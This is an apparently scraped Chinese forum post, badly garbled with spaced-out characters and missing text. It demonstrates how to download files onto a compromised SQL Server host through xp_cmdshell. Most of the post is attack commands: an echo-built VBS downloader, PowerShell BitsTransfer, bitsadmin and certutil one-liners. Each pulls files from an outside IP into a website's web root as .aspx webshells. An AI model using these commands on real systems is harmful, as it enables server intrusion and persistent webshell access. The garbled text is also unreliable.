[20881] 2017-08-31_远程文件下载(利用sqlserver存储过程漏洞执行演示)

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2017-08-31_远程文件下载(利用sqlserver存储过程漏洞执行演示) ( s q l s e r v e r )   l e m o n   L e m o n S e c   2 0 1 7 - 0 8 - 3 1 1 . w i n d o w s   c m d   f t p   f t p , 1 . - - F T P   O R   c m d - - > f t p   2 . o p e n   q i n t . i t h o t . n e t     / * " f t p   q i n t . i t h o t . n e t " F T P 2 1 2 1 2 1 2 1 2 1 o p e n   q i n t . i t h o t . n e t   2 1 2 1 * /     3 . u s e r n a m e : u s e r n a m e       / * * /     4 . p a s s w o r d : u s e r 1 2 3 4       / * u s e r   * /     5 . p u t   i 0 0 1 . j p g   / * ( d : q i n t ) i 0 0 1 . j p g F T P " m p u t   * . * " F T P * /   6 . m p u t   * . h t m h t m 7 . g e t   d 1 2 3 . j p g   / * F T P d 1 2 3 . j p g ( d : q i n t ) " m g e t   * . * " d : q i n t * /   8 . m g e t   * . h t m h t m   9 . d e l e t e   * . *   / * q i n t * /   2 . V B S V B S M i c r o s o f t   V i s u a l   B a s i c   S c r i p t   E d i t o n B A S I C V B S V i s u a l   B a s i c s q l s e r v e r x p _ c m d s h e l l f : w w w r o o t L o t t e r y W e b w g e t . v b s
e c h o   i L o c a l = L C a s e ( W s c r i p t . A r g u m e n t s ( 1 ) )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s                                                                                       e c h o   i R e m o t e = L C a s e ( W s c r i p t . A r g u m e n t s ( 0 ) )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   w s c r i p t . e c h o   " [ ! ] G E T   " , i R e m o t e   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s e t   x P o s t = C r e a t e O b j e c t ( " M i c r o s o f t . X M L H T T P " )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   x P o s t . O p e n   " G E T " , i R e m o t e , 0   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   x P o s t . S e n d ( )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   O n   E r r o r   R e s u m e   N e x t   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s e t   s G e t = C r e a t e O b j e c t ( " A D O D B . S t r e a m " )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s G e t . M o d e = 3   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s G e t . T y p e = 1   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s G e t . O p e n ( )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s G e t . W r i t e   x P o s t . R e s p o n s e B o d y   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s e c h o   s G e t . S a v e T o F i l e   i L o c a l , 2   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s   / /     e x e c   m a s t e r . . x p _ c m d s h e l l   ' e c h o   i L o c a l = L C a s e ( W s c r i p t . A r g u m e n t s ( 1 ) )   > > f : w w w r o o t L o t t e r y W e b w g e t . v b s '
U s a g e : c s c r i p t   / / n o l o g o   f : w w w r o o t L o t t e r y W e b w g e t . v b s   h t t p : / / 1 3 9 . 1 9 9 . 1 0 9 . 1 8 4 / 1 . t x t   f : w w w r o o t L o t t e r y W e b 1 1 . a s p x h t t p : / / 1 3 9 . 1 9 9 . 1 0 9 . 1 8 4 / 1 . t x t   v b s e x e c   m a s t e r . . x p _ c m d s h e l l   ' c s c r i p t   / / n o l o g o   f : w w w r o o t L o t t e r y W e b w g e t . v b s h t t p : / / 1 3 9 . 1 9 9 . 1 0 9 . 1 8 4 / 1 . t x t     f : w w w r o o t L o t t e r y W e b 1 1 . a s p x '
1 1 . a s p x e x e c   m a s t e r . . x p _ c m d s h e l l   ' t y p e     f : w w w r o o t L o t t e r y W e b 1 1 . a s p x ' 1 1 . a s p x
s h e l l 3 . p o w e r s h e l l P o w e r S h e l l   使   . N E T   F r a m e w o r k     W i n d o w s     W i n d o w s   S c r i p t   H o s t   s q l s e r v e r x p _ c m d s h e l l f : w w w r o o t L o t t e r y W e b w g e t . v b s I m p o r t - M o d u l e   B i t s T r a n s f e r                                                                                                   $ u r l = ' h t t p : / / w w w / b a i d u . c o m / l o g o . p n g '                                                                         S t a r t - B i t s T r a n s f e r   $ u r l   d : l o g o . p n g                                                                                 p o w e r s h e l l                                                                                                                                         / / e x e c   m a s t e r . . x p _ c m d s h e l l   ' e c h o   I m p o r t - M o d u l e   B i t s T r a n s f e r   > > f : w w w r o o t L o t t e r y W e b 3 3 3 . p s 1 ' / / e x e c   m a s t e r . . x p _ c m d s h e l l   ' e c h o   $ u r l = " h t t p : / / 1 3 9 . 1 9 9 . 1 0 9 . 1 8 4 / 2 . t x t "   > > f : w w w r o o t L o t t e r y W e b 3 3 3 . p s 1 '   / / e x e c   m a s t e r . . x p _ c m d s h e l l   ' e c h o   S t a r t - B i t s T r a n s f e r   $ u r l   f : w w w r o o t L o t t e r y W e b 3 3 3 . a s p x   > > f : w w w r o o t L o t t e r y W e b 3 3 3 . p s 1 '                                                                                                                                                                                                                     ( 3 3 3 . a s p x         便     w e b s h e l l . a s p x )   / / e x e c   m a s t e r . . x p _ c m d s h e l l   ' p o w e r s h e l l   f : w w w r o o t L o t t e r y W e b 3 3 3 . p s 1 ' 2 2 2 . p s l ,   3 3 3 . p s l 3 3 3 . p s l 3 3 3 . p s l

* 使 P o w e r s h e l l W i n d o w s   P o w e r S h e l l   ( C )   2 0 0 9   M i c r o s o f t   C o r p o r a t i o n
P S   C : W i n d o w s s y s t e m 3 2 >   D : W o r k s h o p P o w e r s h e l l S p r i n k l e r s r c S c r i p t s S P R I N K L E . p s 1   D : W o r k s h o p P o w e r s h e l l S p r i n k l e r s r c S c r i p t s S P R I N K L E . p s 1   " g e t - h e l p   a b o u t _ s i g n i n g "   : 1   :   5 8 +   D : W o r k s h o p P o w e r s h e l l S p r i n k l e r s r c S c r i p t s S P R I N K L E . p s 1   < < < <         +   C a t e g o r y I n f o                     :   N o t S p e c i f i e d :   ( : )   [ ] ,   P S S e c u r i t y E x c e p t i o n         +   F u l l y Q u a l i f i e d E r r o r I d   :   R u n t i m e E x c e p t i o n P S   C : W i n d o w s s y s t e m 3 2 >   g e t - E x e c u t i o n P o l i c y   R e s t r i c t e d " g e t - h e l p   a b o u t _ s i g n i n g " " s e t - e x e c u t i o n p o l i c y "   " s e t - e x e c u t i o n p o l i c y " - -   R e m o t e S i g n e d :   R e q u i r e s   t h a t   a l l   s c r i p t s   a n d   c o n f i g u r a t i o n   f i l e s   d o w n l o a d e d   f r o m   t h e   I n t e r n e t   b e   s i g n e d   b y   a   t r u s t e d   p u b l i s h e r .   P o w e r S h e l l   P S   C : W i n d o w s s y s t e m 3 2 >   s e t - E x e c u t i o n P o l i c y   R e m o t e S i g n e d   使   a b o u t _ E x e c u t i o n _ P o l i c i e s   ?   [ Y ]   ( Y )     [ N ]   ( N )     [ S ]   ( S )     [ ? ]     ( Y ) :   y   P S   C : W i n d o w s s y s t e m 3 2 > w e b s h e l l 4 b i t s a d m i n                                   v i s t a B I T S A d m i n         / / b i t s a d m i n   / t r a n s f e r           : b i t s a d m i n   / t r a n s f e r   n   h t t p : / / d o w n l o a d . s y s i n t e r n a l s . c o m / f i l e s / P S T o o l s . z i p   C : t e s t u p d a t e P S T o o l s . z i p                       / / e x e c   m a s t e r . . x p _ c m d s h e l l   ' b i t s a d m i n   / t r a n s f e r   n   h t t p : / / 1 3 9 . 1 9 9 . 1 0 9 . 1 8 4 / 2 . t x t   f : w w w r o o t L o t t e r y W e b 5 5 5 . a s p x '
5 . c e r t u t i l C e r t u t i l . e x e     W i n d o w s   S e r v e r   2 0 0 3   x p - w i n 1 0 h t t p s : / / t e c h n e t . m i c r o s o f t . c o m / z h - c n / l i b r a r y / c c 7 5 5 3 4 1 ( v = w s . 1 0 c e r t u t i l   - u r l c a c h e   - s p l i t   - f     h t t p : / / w w w . b a i d u . c o m / 1 . r a r                                         / /   U R L                                                                                                                                     / / e x e c   m a s t e r . . x p _ c m d s h e l l   ' c e r t u t i l   - u r l c a c h e   - s p l i t   - f     h t t p : / / 1 3 9 . 1 9 9 . 1 0 9 . 1 8 4 / 2 . t x t '            
c e r t u t i l c e r t u t i l x p - w i n 1 0 h t t p s : / / t e c h n e t . m i c r o s o f t . c o m / z h - c n / l i b r a r y / c c 7 5 5 3 4 1 ( v = w s . 1 0 ) 1 d o w n l o a d e r ( 1 )   U R L e g ( 2 )   e g ( 3 )     c e r t u t i l . e x e   - u r l c a c h e   - s p l i t   - f   h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / 3 g s t u d e n t / t e s t / m a s t e r / v e r s i o n . t x t c e r t u t i l . e x e   - u r l c a c h e   - s p l i t   - f   h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / 3 g s t u d e n t / t e s t / m a s t e r / v e r s i o n . t x t   f i l e . t x t
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则